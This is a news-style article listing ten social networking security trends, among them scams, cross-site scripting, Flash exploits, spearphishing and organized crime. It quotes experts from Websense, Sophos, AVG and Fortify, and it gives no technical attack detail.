10 Social Networking Security Trends To Watch
MySpace. Facebook. LinkedIn. Orkut. Who doesn't have a profile on at least one of these sites these days? The explosion of social networking has reinvented communication as we know it, creating new opportunities to develop friendships, romances and business contacts all over the world -- a fact which has not gone unnoticed by the malware authors and organized crime.
"Things are happening at such a rapid rate, it's hard to slow that momentum," said Dan Hubbard, senior director, security and technology research, for Websense. "And because they're investing so much money in it, it's very difficult to insert security into that paradigm."
"The attackers understand that this is going on and are gravitating toward that," he added.
In a Web 2.0 world, social networking can turn into a security nightmare when hackers exploit users and steal information for profit. As a result, businesses and individuals alike will have to strike a balance, and find new ways to achieve their objectives while staying safe on the Internet.
Here's a look at some of the things experts say we can expect to see more of in the world of Web 2.0 social networking.
Like the Nigerian bank scam, this one is not going away any time soon.
Spammers that are getting the door slammed in their faces with e-mail spam filters now have found new ways to access users with social networking sites, especially in the workplace. Experts say that spam is more profitable than ever.
Experts say that 419 scams, named for the relevant section of the Nigerian penal code, which used to flood employee e-mail inboxes, now target their LinkedIn user profiles. And more attackers will target LinkedIn to access corporate accounts and intellectual property.
A recent phish, detected by researchers as SophosLabs, claimed to come from a 22-year-old woman living in the Ivory Coast who had inherited $6.5 million after her father passed away and requested a safe place (presumably your bank account) for the money to be deposited.
Does anybody actually believe this stuff anymore, you ask. The good news is that many users are already wise to the ways of Nigerian bank scams. The bad news is that some people actually still fall for them.
It's no secret that as applications acquire more functionality, the more susceptible they are to security threats. As social networking sites encourage users to build add-ons for their network, users will be opening themselves up to exploits from vulnerabilities in third-party applications. Consequently, users will increasingly be subjected to things like buffer overflow vulnerabilities in image uploaders, which are typically hosted by third parties.
"The more function an application has, the less secure it tends to be," said Roger Thompson, chief research officer for AVG. "There are simply more opportunities for things to go wrong."
Perhaps nothing is more ironic than pesky banner ads claiming that your site is hosting every kind of virus known to man and then offering to clean it up -- for a small fee of course. As more social networking users increasingly fear malware on their computers, they become bigger targets for these kinds of pop-up adware, tricking them to download fake anti-virus cleaners which are benign at best and destructive at worst. The irony of course is that this kind of adware is doing the very things that they're trying to prevent.
It's social networking at its finest. Experts say social networking users can expect more threats to travel virally -- what infects one person will then infect everyone on his or her friends list.
One recent example was the Orkut worm, in which a prankster spread a spammy message to almost 400,000 Brazilian with profiles on the site. However, experts say that other rapid, self-replicating viruses will likely be more malicious, designed to steal or delete users' personal information like date of birth and passwords. That data can then be sold in numerous black market economies or used to acquire credit card and bank information. Often the same login credentials used on Facebook and MySpace are also used to access banking and other sensitive accounts.
In a recent attack, millions of Facebook users were left exposed to a cross site scripting vulnerability affecting the user interface of the site's Job page. Among other things, the vulnerability gave the attackers the ability to install malicious software as well as trick users into handing over their credentials through fake logins. The social networking site plugged the hole May 23.
The takeaway is that the same threats plaguing Web 2.0 are amplified on social networking sites. Why? Because these sites rely on the prolific and rapid spread of information between users. And unlike other pages, malicious software is bound to be exposed to a high volume of people on these sites.
That said, it's safe to say that users can expect more than a poke once these vulnerabilities are detected by attackers. Reflecting the growing Web 2.0 threat, attackers will continue to find and exploit cross site scripting vulnerabilities on social networking sites. Once exploited, users will generally become the recipients of malicious downloaders, often unbeknownst to them, such as information stealing code or keystroke loggers.
It's the beauty of Web 2.0. There are more attacks on Flash now than ever before. Applications such as Adobe Air and Microsoft Silverlight, which allow the browser to be used in a more effective way, also increase the attack surface.
Naturally, the prolific use of Flash is one of the evolutions that make Facebook and MySpace so lucrative to attackers. As anyone with a profile knows, these technologies are extremely pervasive, as well as fun, when doing social networking. Unfortunately, a recent exploit in Adobe Flash has become a huge security threat. Experts say that so far hundreds of thousands of Websites have been compromised, including thousands of networking site pages, as the result of the Flash exploit loose in the wild.
As companies restrict access to social networking sites, the individual user will become the victim of highly targeted and personalized spearphishing attacks. These attacks could come in the form of spoofed pages. Or simply by an unknown user inviting someone to join their friend network.
It won't be hard. After all, a lot of your information, from where you spent your last vacation to your childhood pet, is probably already somewhere on your profile. Often, attackers will spoof or create a profile that will appear to be legitimate, then social engineer a message to entice the user to click in lots of places. Plus, experts say that often users are often more willing to click on unknown links or surrender personal information because they're on a trusted medium that encourages the unrestricted sharing of information.
"There's a huge problem of users using information in an unsafe way and sharing social information without thinking who could possibly be looking," said Graham Cluley, senior security consultant for Sophos. "If you make up a mother's maiden name, it isn't a matter of public record. There's no reason to display it for all and sundry to see."
With increased mobility, companies are also moving to become more flexible regarding users' rights to access their social networking pages.
This creates problems when it opens up completely new threat vectors. So don't be surprised if you see companies accordingly adopting policies that include social networking etiquette and safety. In addition, companies will also start to crack down on usage of these sites, or implement technology to limit how long you can be chatting with your former college roommate on Facebook.
"There are so many companies that have presence within those pages. Now companies are starting to create flexible policies and open those things up," said Dan Hubbard, senior director, security and technology research, for Websense. "Like anything there's user education, policies and enforcement. You have to have the technology to back these things up."
When one door closes another opens.
This tried and true adage has never rung more true than with social networking. Attackers frustrated by their inability to enter corporate networks because of sophisticated controls, now have a whole new point of entry with LinkedIn, which allows them to access personal professional information and spoof employee profiles.
Plus, it's no secret that attackers follow the money. This networking site aimed at professionals also opens up a whole new attack vector for organized crime intending to pilfer intellectual property and corporate information, as well as the typical credit cards and social security numbers used in identity theft.
Reflecting current cyber crime trends, experts say that attacks on social networking sites will increasingly become more financially driven.
Until recently, attacks like the Sammy worm on Facebook simply shut down sites and impeded traffic. However, soon similar attacks will wreak havoc on users' bank accounts as attacks become more complex and organized. This also means that sites like Facebook -- which touts a more professional, white-collar user base, as well as professional networking sites like LinkedIn, will increasingly become targets for organized crime.
"The types of attacks we've already seen, we'll see more of. They'll be better targeted toward monetization," said Brian Chess, founder and chief scientist for Fortify Software. "Along those same lines, having all of your information all there on a site that isn't controlled by users and whose security practices aren't paramount, isn't always the best deal.
While experts say that they can't predict the future, it's likely that social networking sites like MySpace and Facebook will start taking more responsibility regarding their security practices -- especially if users significantly change their behavior or avoid logging on altogether.
"Individuals have a tough time making decisions about security," said Chess, "but when they do, they can be really fickle about it."